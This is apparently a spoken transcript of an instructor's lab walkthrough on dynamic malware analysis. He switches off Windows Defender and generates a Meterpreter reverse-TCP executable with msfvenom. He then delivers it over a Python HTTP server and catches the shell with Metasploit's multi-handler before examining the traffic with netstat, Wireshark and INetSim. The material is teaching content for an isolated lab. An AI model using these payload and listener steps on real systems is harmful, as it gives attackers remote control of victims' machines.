right, hello, good morning, good evening, wherever you are. Let's take a look at lab number 13, network investigation using dynamic malware analysis. We're going to be looking at network investigation this morning. Our lab objective is to gain hands-on experience with generating malware and investigating its effects using methods learned during the lesson. Our lab mission is to create malware and investigate it using tools introduced during the lesson. You're going to need your Windows 7 machine and your Kali Linux machine, and you want to make sure that your computers are on the same network and that they're able to talk to each other. Mine are on the NAT network, and my IP address for my Kali machine is 10.0.2.15, and my IP address for my Windows machine is 10.0.2.16. So it might be good to just go ahead and write that down for your notes. All right, so our lab task is we're going to use msfvenom. We're going to use Metasploit framework to actually create some malware and investigate its influence over the network. All right, so first thing we want to do on our Windows machine is make sure that we have Wireshark installed. As you see, I do have Wireshark installed on my computer. Next thing you want to do is make sure that your Windows Defender is turned off. So we can go to the Start button and just type in Defender, right? And we want to turn this off. So we can go to the Tools menu here. Let's see. Real-time protection is off. That is good. All right. I think we are good. Let's see what other options we have here. Nothing else. It's pretty limited here. All right, but I think the important thing is here it says real-time protection is off. Last scan not available. Anti-spyware definition is not available. So this machine is for the taking. All right. And we want to, let's see, deselect automatically scan my computer. Okay. So let's see if we can't proceed here. I'm just checking. Let's see. Just checking my Windows Defender. Making sure. I'm going to say, check for updates now. Let's see. It shouldn't be able to. I don't think I have internet on here. Whoops. Ping google.com. Oh, looks like I can. Let's see what we got here. Okay, so it says you must install the latest, can't install, the update certificate chain cannot be found here. Okay, so we are going to attempt to proceed here and see what happens. All right. So next thing we want to do is go ahead and create our payload here using msfvenom. And we're going to set up a listener on the Kali machine for the malware and then transfer it to the Windows 7 machine. So let's go ahead and get our reverse shell set up here. So we want to type msfvenom and we want to do -p and then Windows /x64 /meterpreter /reverse TCP. Set up our local host here. And we want to do this for our Ethernet 0. Listening port will be 1337. And we're going to output this to an exe. We're going to output this to the root. /desktop. Or I can do mine. I think my user is actually Kali, so I'm gonna do Kali. And mal.exe. All right, let's see if I got my syntax right here. Before we proceed, msfvenom-p Windows/x64 Meterpreter reverse TCP listening host equals Ethernet 0, listening port equals 1337, outputting it to executable. And let's see, let's go ahead and try that. Okay, so it did not like my location here. So let's see where I currently am here. Let's see what we got. So I'm just gonna go to properties, home Kali desktop. Okay, so I'm gonna say home Kali desktop. There we go. You can see my malware has been created. Okay, next we want to create our listener, our listener here, and start our HTTP server over port 80. So just like we did in the last class, we're going to make python-m. We're going to do simple HTTP server on port 80. All right. Next, we want to go to our Windows Explorer, and we want to browse to the Kali Linux IP to download the executable file. So we're going to do 10.0.2.15 and type that in. And as you can see, I'm going to say close here. Whoops, there we go, directory listing. We want to download, go to our desktop here and look for our malware file. So let's go to desktop, and then here's our malware file. I'm going to click on save, and let's see, it wants us to save it to our downloads here. All right, let's go ahead and check this out. If we're good, it'll complete, but if not, let's see what we got. Okay, download complete. Let's go ahead and check that. Let's just check the file size, make sure we got the whole thing here. 7 kilobits on the Kali, and on the Windows side, if we go to our Explorer, we go to downloads, yeah, we've got 7 kilobits. Looks like Windows Defender did not eat this up. Okay, so we've got the malware on the Windows 7 machine. Now we want to start our MSF console. So let's go ahead and get that started here. So we want to go to Metasploit Framework Console. Okay, let's see what we got today for our graphic. Okay, we get this nice little permission denied one. Okay, let's go ahead and continue. We want to use the multi-handler. All right, now we want to set up our payload here. So set payload to Windows x64 interpreter verse TCP. All right, that looks good. Okay. All right. So now we want to set up our listening host. And that's the same one as before. So we're going to say set listening host to Ethernet 0, computer we're going to be listening on. And our listening port will be 1337. All right, and now we want to run. Okay, so our reverse TCP handler has started on here. All right, so now they want us to run the malware on our Windows 7 machine. And let's go ahead and do that. I'm going to say run as an administrator. I'm going to say yes. All right, we can see that our session has opened. Now we want to go ahead and identify the malware's connection using netstat command and Wireshark. So first thing we'll do is we'll get command prompt. We're going to run as admin. I'm going to say yes. All right, let's go ahead and do netstat NAB. All right, let's expand this out. Let's see what we have here. Let's go ahead and we'll expand it out and then run it again, make it easier to read here. If it lets us. Well, it looks like it's not letting us get it any bigger, but that's okay. Netstat -NAB. Whoops. It's a little better here, but as you can see, we got some traffic here. And let's see what we got. What do we see? We are getting, here we go. Got some UDP traffic here and some other traffic here. And let's see what else we got. We're listening. We got a established connection here on our TCP port here. And look right there. That's what we were looking for. 10.0.15.1337. Right there, established. Okay, so next thing they want us to do is to go ahead and launch Wireshark. All right, and they want us to go ahead and start a capture. I'm going to say skip. And let's go ahead and move this around, make it easier here. And they want us to run the malware again. And look at the traffic that is generated. As you can see here, we got a lot of traffic being created once this malware is up and running. And what we want to do now is look for the traffic that is coming from our Kali machine. So we want to do that by typing in ip.destination equals 10.0.2.15, right? All of that is coming from our Kali machine. Okay. All right, so that looks good. Next, we want to go back to our Kali machine, and we're going to use the Internet Tool Simulator. That's the iNetSim. We're going to set this up to listen to Kali Linux and see what we got going on. So we want to go to Nano. So that's Etsy, iNetSim, and then inetsim.conf. All right, what we want to do is we got a couple lines that we want to edit. The lines we want to edit, the first one is the service bind. So let's go ahead and find that. We can do that by the where. I'm just going to search service underscore bind. There we go. Service bind address. What we want to do is we want to change this one to our Kali machine here. So we want to uncheck that one and make this our Kali machine. So our Kali machine is 10.0.2.15. Okay. And we also want to say create reports yes. So let's go back here and let's find that one. Let's say Control W where, and let's say create report. There we go. And we want to change this one to yes. And you can see by default, it's set to be no. So let's go ahead and uncomment that out and change this to a yes. All right. The next one we want to do is change our DNS defaults to match our Kali IP address. So let's go to DNS default, and we're going to change this one again to 10.0.2.15. All right, once you're done, you want to go ahead and press Control O, and you want to write this file. Permission denied. That's all right. I forgot to do this as sudo. So let's go ahead and do the same thing here. Well, let's do this again. Sudo nano / etc inetsim / inetsim.conf. All right, this time we got it. So let's go ahead and go back to service bind 10.0.2.15. And then the next one was create reports. And the last one was DNS default. To our Kali machine here, so 10.0.2.15. All right, now we can save. Now we can exit. All right. All right, so we've got all that. We're good here. Set up our internet simulator here. Now we want to configure our Windows machine. We want to configure our Windows machine internet connection to intercept the connection from the Kali machine. Then we're going to run an ns lookup command via Meterpreter. All right, so let's go ahead and get our computer set up here on the Windows side. And I'm going to minimize all of this and minimize that. We're going to go ahead and go to our network settings here. We're going to change adapter settings. And we're going to go to properties, TCP v4. And what we want to do is we want to set our default gateway DNS and the preferred DNS server to be our Kali machine. So I'm going to go ahead and get rid of our secondary DNS, primary DNS. All right, going to make this one 10.0.2.15, and the same thing, 10.0.2.15. All right, so the Kali is now acting as our router and our DNS. So go ahead and press OK here and OK. All right, so next thing we want to do is we want to, I'm going to say home network, that's fine. Yep, that's all good. We're going to go to the start menu and we're going to take a look at our Kali stuff here. So next thing we want to do is go to MSF console. Yep, that looks good. Let's see, so let's do that. Let's see, so in the Kali machine, go to terminal, and we want to run the following command. So let's try this. Shell. Okay. You can see right here, I've established the shell, and I'm now on my Windows machine here, and now I can type in ns lookup www.google.com. And this is coming from my Windows machine. So I now have reverse shell, and I am actually getting information all from my Windows machine. All right. The next thing they want us to do is to run the, let me close this one. Yep. inetsim. And we want to look at the logs from our malware. So let's go ahead and run inetsim. Whoops. There we go. And we can see we got some logs generated right here. All right, we've got our connections, we got our DNS, we got our process IDs here. Everything is looking good. And we got a lot of logs. Got some all. Again, this is all about a fake internet simulator here. But all the logs have started and we're good. DNS on port 80 has already been bind. That's why that failed there. Okay, so let's go ahead and let's go to a new tab here. Let's see if we can't look at some more logs here. So let's see. Let's go to Nano. And we want to look at some logs for some traffic. So let's go to nano/var/log/inetsim service.log. Let's see if we can't see some traffic here. Let me take a look at var/log. Okay, no such thing exists. Okay, so now that we've started inetsim, we're going to go ahead and do some more lookups here. So let's go ahead and type ns lookup google.com, ns lookup google.com. All right. Let's see if we get some logs now. cd/var/log. And let's see what we got here. inetsim. Let's go to cd inetsim. Oh, looks like permission is denied. Sudo. Okay, so I guess they want it to be in root. So let's do su dash. All right, so let's do cd/var/log. All right. See what we got here. So we do have some service logs here, and they want us to take a look at this. So let's take a look at nano service log. And we do see we got some traffic here. And what they want us to look for is we're actually trying to query google.com right here. And you can see we have some connections. right? This is coming from our Windows machine, right? 10.0.2.16. So it looks like, yeah, we are intercepting this traffic and we are taking advantage of its DNS. And that is the end of the lab. So pretty cool lab, right? So we made malware. We then set off the malware. We then saw that it was making connections here, right? And then we were able to get an actual reverse shell with the malware. So now in this machine, right, we have actual, a full use of this computer here. So, I can type in dir and I can get my stuff here. I can go to users, or I can go to, let's see what I got here. I got Windows, and let's do system32 calc.exe. And you can see right here, calculator popped up on this computer. So again, we've got root, we popped the shell. I'll see you in lab number 2.